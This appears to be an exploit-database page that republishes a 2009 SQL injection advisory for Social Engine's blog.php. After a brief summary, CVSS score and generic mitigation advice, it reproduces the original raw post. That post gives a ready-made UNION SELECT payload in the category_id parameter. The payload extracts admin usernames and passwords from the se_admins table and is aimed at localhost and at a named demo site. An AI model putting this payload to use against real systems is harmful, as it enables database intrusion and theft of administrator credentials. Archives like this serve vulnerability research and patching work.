header-logo
Suggest Exploit
vendor:
Social Engine
by:
Snakespc
7.5
CVSS
HIGH
SQL Injection
CWE
Product Name: Social Engine
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Social Engine (blog.php) SQL Injection Vulnerability

The Social Engine (blog.php) application is vulnerable to SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'user' parameter in the blog.php URL.

Mitigation:

The vendor should release a patch or update to fix this vulnerability. In the meantime, users can mitigate the risk by implementing input validation and sanitization techniques to prevent SQL injection attacks.
Source

Exploit-DB raw data:

                                                                     
                                                                     
                                                                     
                                             
==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	             Social Engine (blog.php) SQL Injection Vulnerability                                +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =                                                                                   
                =            http://www.socialengine.net/demos.php  "blog.php"                       =
                  ===================================GAZA=============================================

Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members 
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================

# milw0rm.com [2009-01-28]

Navigation

Suggest Exploit

Services By CQR